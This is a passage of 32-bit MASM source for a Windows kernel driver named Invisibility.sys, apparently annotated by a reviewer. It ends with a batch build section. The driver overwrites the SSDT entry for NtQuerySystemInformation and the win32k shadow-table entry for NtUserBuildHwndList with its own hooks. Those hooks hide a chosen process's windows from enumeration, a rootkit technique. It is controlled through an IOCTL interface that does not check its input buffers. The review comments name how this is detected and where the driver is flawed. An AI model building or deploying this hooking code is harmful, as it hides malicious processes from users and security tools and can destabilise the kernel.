; HWND from the process we want to hide ?
MOV EAX, dwPID
CMP EAX, dwTargetPID
JNZ @F
MOV DWORD PTR [ESI], 0FFFFh ; corrupt the chain item rather than REP MOVSX
@@:
; next chain entry
LODSD
SUB ECX, ECX
CMP ECX, [ESI] ; end of HWND list ?? (DD 0x0)
JZ @@loop_end
INC ECX
CMP ECX, [ESI] ; end of HWND list ?? (DD 0x1)
JZ @@loop_end
jmp @@loop
@@loop_end:
RET
HandleNtUserBuildHwndListHookOutput ENDP
;
; NTSTATUS NTAPI
; NtUserBuildHwndList( ; my guesses
; IN ARGUMENT_1, ; ...
; IN hParentHwnd, ; ..
; IN BOOL,
; IN ARGUMENT_4,
; IN SpaceForHandlesInBufferCount,
; OUT pOutputBuffer,
; OUT pbResult
; );
;
;-----------------------------------------------------------------------
; NtUserBuildHwndListHook
; Replacement entry that EstablishHook writes into the win32k shadow
; service-table slot of NtUserBuildHwndList (the displaced handler
; address lives in pOldWin32kNUBHL).  Plain label, not a PROC: no USES
; list and no frame.  Entered with the caller's 7 arguments above the
; return address; discards them itself with RET 4 * 7 (stdcall).
; Flow: forward all 7 arguments to the original handler; if it returned
; 0 (STATUS_SUCCESS) and arguments 2 and 3 are both 0, hand argument 6
; (pOutputBuffer) to HandleNtUserBuildHwndListHookOutput, which edits
; the returned HWND list in place.  The original NTSTATUS in EAX reaches
; the caller unchanged because the post-processing runs between
; PUSHA/POPA.
; Reviewer note: a service-table entry resolving outside the win32k
; image is what SSDT-integrity checks flag; this label is such an entry.
;-----------------------------------------------------------------------
NtUserBuildHwndListHook:
; INT 3
; call the original NT API handler
; At entry [ESP] = return address, [ESP+4] = arg 1 ... [ESP+28] = arg 7.
; Every PUSH lowers ESP by 4, so the fixed offset 4 + 4*6 selects the
; next-lower original argument each time: arg 7 first, arg 1 last.
PUSH [ESP + 4 + 4 * 6] ; push org arg 7
PUSH [ESP + 4 + 4 * 6] ; push org arg 6
PUSH [ESP + 4 + 4 * 6] ; ...
PUSH [ESP + 4 + 4 * 6]
PUSH [ESP + 4 + 4 * 6]
PUSH [ESP + 4 + 4 * 6]
PUSH [ESP + 4 + 4 * 6]
CALL pOldWin32kNUBHL ; call org API addr; assumed stdcall (it pops the 7 copies - ESP is not adjusted here)
; we come into play - modify output
PUSHFD ; keep flags and every GPR (incl. the NTSTATUS in EAX) intact across the post-processing
PUSHA
TEST EAX, EAX ; did the call succeed ? (NTSTATUS 0 == STATUS_SUCCESS; EAX stays 0 for the compares below)
JNZ @@NUBHLH_mod_fini
; skip PUSHFD (4) + PUSHA frame (SIZEOF PUSHA_STRUCT, presumably 32) + return address (4) to reach arg 1
LEA ESI, [ESP + 4 + SIZEOF PUSHA_STRUCT + 4] ; ESI -> org arg list
CMP [ESI + 4 * 1], EAX ; arg 2 == 0 when called from EnumWindows (author's assumption about the caller)
JNZ @@NUBHLH_mod_fini
CMP [ESI + 4 * 2], EAX ; arg 3 == 0 when called from EnumWindows
JNZ @@NUBHLH_mod_fini
PUSH [ESI + 4 * 5] ; push arg 6 - pOutputBuffer
CALL HandleNtUserBuildHwndListHookOutput ; expected to pop its own argument - nothing adjusts ESP afterwards
@@NUBHLH_mod_fini:
POPA
POPFD
RET 4 * 7 ; stdcall return: drop the caller's 7 arguments
;
; Purpose: Hook the targets
;
; Return type: void
;
;-----------------------------------------------------------------------
; void EstablishHook(void)                       (stdcall, no arguments)
; Installs the two service-table hooks:
;   ntoskrnl SSDT   slot dwNQSI_NT_ID           <- NtQuerySystemInformationHook
;   win32k shadow   slot dwNUBHL_NT_ID - 1000h  <- NtUserBuildHwndListHook
; The displaced addresses are stored in pOldNtOsNQSI / pOldWin32kNUBHL
; for the hooks to chain to and for UnhookSystem to restore.
; Inputs are the globals filled in by DriverDispatch (IOC_PROVIDE*); the
; routine returns early if any of the first three still holds the
; "unset" sentinel -1.
; Clobbers: EAX, EDX, flags (ESI, EDI, EBX are restored via USES).
; Reviewer note: this is the pattern kernel-patch detection (x64 Kernel
; Patch Protection, SSDT-integrity scanners) is built around - after this
; runs, both slots point into this driver's image instead of
; ntoskrnl/win32k.  This is 32-bit code.
;-----------------------------------------------------------------------
EstablishHook PROC USES ESI EDI EBX
; INT 3
; test whether we've all needed information
SUB EAX, EAX
DEC EAX ; EAX == -1
CMP dwNQSI_NT_ID, EAX
JZ @@exit
CMP dwTargetPID, EAX
JZ @@exit
CMP dwNUBHL_NT_ID, EAX
JZ @@exit
CMP pGetWindowThreadProcessId, EAX ; NOTE(review): no conditional jump follows, so this compare has no effect, unlike the three above
; overwrite NQSI's API address in SSDT
MOV EAX, _KeServiceDescriptorTable ; presumably the import slot, hence the extra indirection on the next line - confirm
MOV EDI, [EAX] ; EDI -> ptr 2 SSDT
MOV EDX, dwNQSI_NT_ID ; EDX == NQSI ID
MOV EBX, NtQuerySystemInformationHook
MOV EDI, [EDI].SSDT.pSSAT ; EDI -> Native API addr chain
XCHG EBX, [EDI + 4 * EDX] ; swap the hook in; XCHG with a memory operand is implicitly locked on x86
MOV pOldNtOsNQSI, EBX ; save old handler
; over write NUBHL's API address in SSDT
MOV EAX, pKSDTS ; set by DriverEntry from GetKeServiceDescriptorTableShadow
MOV EDI, [EAX] ; EDI -> Native API addr chain (UnhookSystem reads [EAX].SSDT.pSSAT here; same only if pSSAT is at offset 0 - confirm)
MOV EDX, dwNUBHL_NT_ID
SUB EDX, 01000h ; exclude 0x1000 flag from win32k ID (table-selector bit; the shadow table is indexed by the low bits)
MOV EBX, NtUserBuildHwndListHook
XCHG EBX, [EDI + 4 * EDX]
MOV pOldWin32kNUBHL, EBX
@@exit:
RET
EstablishHook ENDP
;
; Purpose: Unhook the locations
;
; Return type: void
;
;-----------------------------------------------------------------------
; void UnhookSystem(void)                        (stdcall, no arguments)
; Writes the addresses saved by EstablishHook back into both
; service-table slots.  Does nothing while either saved pointer is still
; 0 (EstablishHook never ran).  The service IDs come from the same
; globals EstablishHook used and are not re-validated here.
; Restores are plain DWORD stores (EstablishHook used XCHG); the saved
; pointers are left as they are, so a repeated call rewrites the same
; values.
; Clobbers: EAX, EDX, flags (ESI, EDI, EBX are restored via USES).
;-----------------------------------------------------------------------
UnhookSystem PROC USES ESI EDI EBX
; INT 3
SUB EAX, EAX
CMP pOldNtOsNQSI, EAX ; 0 == nothing to restore
JZ @@exit
CMP pOldWin32kNUBHL, EAX
JZ @@exit
; rewrite NQSI API address in SSDT
MOV EAX, _KeServiceDescriptorTable
MOV EAX, [EAX] ; -> SSDT descriptor (same double indirection as EstablishHook)
MOV EAX, [EAX].SSDT.pSSAT ; -> service address table
MOV EDX, dwNQSI_NT_ID
MOV EBX, pOldNtOsNQSI
MOV [EAX + EDX * 4], EBX
; rewrite NUBHL API address in SSDT
MOV EAX, pKSDTS
MOV EAX, [EAX].SSDT.pSSAT ; NOTE(review): EstablishHook reads [EAX] here; the two agree only if pSSAT is the first field - confirm
MOV EDX, dwNUBHL_NT_ID
SUB EDX, 01000h ; exclude 0x1000 flag from win32k ID
MOV EBX, pOldWin32kNUBHL
MOV [EAX + EDX * 4], EBX
@@exit:
RET
UnhookSystem ENDP
Comment %
;
; Return type: void*
;
GetMem PROC dwc : DWORD
PUSH dwc
PUSH PagedPool
CALL ExAllocatePool
RET
GetMem ENDP
;
; Return type: void
;
FreeMem PROC p : LPVOID
PUSH p
CALL ExFreePool
RET
FreeMem ENDP
%
;
; Purpose: Handle device IO requests
;
;-----------------------------------------------------------------------
; NTSTATUS DriverDispatch(PDRIVER_OBJECT pDriverObject, PIRP pIrp)
; Registered by DriverEntry for IRP_MJ_DEVICE_CONTROL and IRP_MJ_CREATE.
; Every IRP is completed with Status = 0 and Information = 0, and the
; routine returns STATUS_SUCCESS; IOCTL codes not listed below are
; accepted silently.  Control interface - one DWORD read from
; SystemBuffer (METHOD_BUFFERED style input):
;   IOC_PROVIDE1  NtQuerySystemInformation address -> pNQSI, dwNQSI_NT_ID
;   IOC_PROVIDE2  target process id                -> dwTargetPID
;   IOC_PROVIDE3  EnumWindows address              -> dwNUBHL_NT_ID
;   IOC_PROVIDE4  GetWindowThreadProcessId address -> pGetWindowThreadProcessId
;   IOC_HOOK / IOC_UNHOOK                          -> EstablishHook / UnhookSystem
; Reviewer notes:
;   * Neither SystemBuffer nor the stack location's input-buffer length
;     (InputBufferLength in the WDK definition) is checked before [EAX]
;     is read, so a request with no or short input reaches an
;     unvalidated kernel read.  Standard driver hardening: validate
;     buffer presence and length per IOCTL.
;   * pDriverObject is unused in this block.
;-----------------------------------------------------------------------
DriverDispatch PROC USES ESI EDI EBX, pDriverObject, pIrp
MOV EDI, pIrp ; EDI -> IRP struct
ASSUME EDI : PTR _IRP
SUB EAX, EAX
MOV [EDI].IoStatus.Information, EAX ; no output bytes
MOV [EDI].IoStatus.Status, EAX ; 0 == STATUS_SUCCESS, set up front and never changed below
ASSUME EDI : NOTHING
MOV ESI, (_IRP PTR [EDI]).PCurrentIrpStackLocation ; ESI -> IRP stack
ASSUME ESI : PTR IO_STACK_LOCATION
.IF [ESI].MajorFunction == IRP_MJ_DEVICE_CONTROL
; INT 3
MOV EAX, [ESI].DeviceIoControl.IoControlCode ; EAX = DeviceIoControl code
.IF EAX == IOC_PROVIDE1
MOV EAX, (_IRP PTR [EDI]).SystemBuffer ; EAX -> in buffer (not checked for NULL or length)
PUSH [EAX] ; argument for NativeApiIdFromApiAddress (callee assumed to pop it - ESP is not adjusted after the CALL)
PUSH [EAX]
POP pNQSI ; pNQSI = supplied NtQuerySystemInformation address
CALL NativeApiIdFromApiAddress
MOV dwNQSI_NT_ID, EAX ; service id derived from that address
.ELSEIF EAX == IOC_PROVIDE2
MOV EAX, (_IRP PTR [EDI]).SystemBuffer ; EAX -> in buffer
PUSH [EAX]
POP dwTargetPID ; dwTargetPID = first DWORD of the input
.ELSEIF EAX == IOC_PROVIDE3
MOV EAX, (_IRP PTR [EDI]).SystemBuffer ; EAX -> in buffer
;PUSH [EAX]
;POP pEW
MOV EAX, [EAX] ; EAX == EnumWindows ptr
LEA EAX, [EAX - 14] ; 14 decimal: fixed offset tied to one user32 build - presumably where NativeApiIdFromApiAddress reads the id from; confirm
PUSH EAX
CALL NativeApiIdFromApiAddress
MOV dwNUBHL_NT_ID, EAX
.ELSEIF EAX == IOC_PROVIDE4
MOV EAX, (_IRP PTR [EDI]).SystemBuffer
PUSH [EAX]
POP pGetWindowThreadProcessId
.ELSEIF EAX == IOC_HOOK
CALL EstablishHook
.ELSEIF EAX == IOC_UNHOOK
CALL UnhookSystem
.ENDIF
.ENDIF
ASSUME ESI : NOTHING
; IoCompleteRequest is FASTCALL: ECX = Irp, DL = PriorityBoost
MOV EDX, IO_NO_INCREMENT ; special calling
MOV ECX, pIrp
CALL IoCompleteRequest
MOV EAX, STATUS_SUCCESS ; returned no matter which branch ran
RET
DriverDispatch ENDP
;-----------------------------------------------------------------------
; void DriverUnload(PDRIVER_OBJECT DriverObject)
; Unload routine registered by DriverEntry: deletes the symbolic link
; built from szSymPath and the device object saved in pDevObj.
; NOTE(review): nothing here restores the service tables.  If the slots
; still point into this image at unload, the next call to either patched
; service dispatches into unmapped memory; the unload relies on
; IOC_UNHOOK having been sent beforehand.
; DriverObject is unused in this block.
;-----------------------------------------------------------------------
DriverUnload PROC USES EBX ESI EDI, DriverObject
LOCAL usSym : UNICODE_STRING
; cleanup
INVOKE RtlInitUnicodeString, ADDR usSym, OFFSET szSymPath
INVOKE IoDeleteSymbolicLink, ADDR usSym
INVOKE IoDeleteDevice, pDevObj
RET
DriverUnload ENDP
; DriverEntry is placed in a section named INIT, which the kernel loader
; discards once initialization is complete - nothing in it may be
; called afterwards.
.CODE INIT
;-----------------------------------------------------------------------
; NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegPath)
; Creates the control device (szDevPath, object saved in pDevObj) and its
; symbolic link (szSymPath), routes IRP_MJ_DEVICE_CONTROL and
; IRP_MJ_CREATE to DriverDispatch, registers DriverUnload, and caches the
; shadow service-table pointer in pKSDTS.
; Returns STATUS_SUCCESS, or the failing IoCreateDevice /
; IoCreateSymbolicLink status unchanged in EAX.
; Reviewer notes:
;   * IoCreateDevice is called with DeviceCharacteristics 0; the device
;     therefore gets the default ACL for FILE_DEVICE_NULL, and the IOCTL
;     interface is not restricted beyond that.
;   * On the symbolic-link failure path the device object created just
;     before is not deleted.
;   * RegPath is unused in this block.
;-----------------------------------------------------------------------
DriverEntry PROC USES EBX ESI EDI, DriverObject, RegPath
LOCAL usDev : UNICODE_STRING
LOCAL usSym : UNICODE_STRING
; INT 3
; create device/symbolic link
INVOKE RtlInitUnicodeString, ADDR usDev, OFFSET szDevPath
INVOKE IoCreateDevice, DriverObject, 0, ADDR usDev, FILE_DEVICE_NULL, 0, FALSE, OFFSET pDevObj
OR EAX, EAX ; NTSTATUS: 0 == success
JNZ @@ExitProcErr ; return the failing status as-is
INVOKE RtlInitUnicodeString, ADDR usSym, OFFSET szSymPath
INVOKE IoCreateSymbolicLink, ADDR usSym, ADDR usDev
OR EAX, EAX
JNZ @@ExitProcErr ; NOTE(review): pDevObj is left in place on this path
; setup DriverObject
MOV ESI, DriverObject
ASSUME ESI : PTR DRIVER_OBJECT
MOV [ESI].PDISPATCH_IRP_MJ_DEVICE_CONTROL, OFFSET DriverDispatch
MOV [ESI].PDISPATCH_IRP_MJ_CREATE, OFFSET DriverDispatch ; CREATE uses the same handler, which completes it with success
MOV [ESI].PDRIVER_UNLOAD, OFFSET DriverUnload
ASSUME ESI : NOTHING
; save the shadow-table pointer returned by GetKeServiceDescriptorTableShadow
CALL GetKeServiceDescriptorTableShadow ; result consumed by EstablishHook/UnhookSystem; not checked for 0 here
MOV pKSDTS, EAX
MOV EAX, STATUS_SUCCESS
@@ExitProc: ; both labels just return; the error label keeps the NTSTATUS already in EAX
RET
@@ExitProcErr:
RET
DriverEntry ENDP
; END stops the assembler here: the lines that follow are only ever read
; by cmd.exe when this file is executed as a batch script (see :MAKE).
End DriverEntry
:MAKE
REM Build section, reached when this file runs as a batch script; the
REM assembler never sees it because it stops at END above.
REM ML: /c assemble only, /coff COFF object, /Gz stdcall as the default
REM calling convention, /Cp preserve identifier case.
\MASM32\BIN\ML /c /coff /Gz /Cp /nologo InvisibilityKMD.BAT
REM LINK: kernel driver image (/DRIVER, /SUBSYSTEM:NATIVE); /IGNORE:4078
REM silences LNK4078 (same-named sections with different attributes).
\MASM32\BIN\LINK /nologo /DRIVER /BASE:0X10000 /ALIGN:32 /OUT:Invisibility.sys /SUBSYSTEM:NATIVE /IGNORE:4078 /OPTidata InvisibilityKMD.obj
REM Move the driver to the parent directory and drop the intermediates.
MOVE Invisibility.sys ..
DEL *.OBJ
ECHO.
PAUSE
CLS